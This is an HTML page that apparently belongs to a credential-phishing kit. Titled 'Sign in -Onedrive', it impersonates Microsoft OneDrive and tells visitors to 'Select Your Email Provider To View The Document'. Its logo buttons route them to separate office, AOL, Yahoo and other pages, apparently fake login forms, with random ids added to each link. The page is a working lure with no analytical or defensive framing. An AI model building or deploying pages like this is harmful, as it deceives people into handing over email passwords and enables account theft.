<!doctype html>
<html>
<head>
<title>Sign in -Onedrive</title>
</head>
<body>
<style type="text/css">
body{

    background: url('https://i.imgur.com/xxpDqiS.jpg') no-repeat fixed;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
    background-size: 100%;
}
.text{
  font-family: sans-serif;
  font-size: 22px;
  font-weight: bold;
  color:#2E3065;    
  position: relative;
    right: 0;
    top:85px;
}
.buttons {
 position: relative;
    right: 0;
    top:100px;
}
</style>
<center>

<div class="text">Select Your Email Provider To View The Document</div><br>
<div class="buttons">
<a href="office.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/ovjqCtH.png"></a><br><br>
<a href="office.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/qQacJbc.png"></a><br><br>
<a href="aol.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/DwbYg3Q.png"></a><br><br>
<a href="yahoo.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/jJAZQsm.png"></a><br><br>
<a href="other.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/KqocK06.png"></a><br><br><br>
</div>
</center>
</body>
</html>
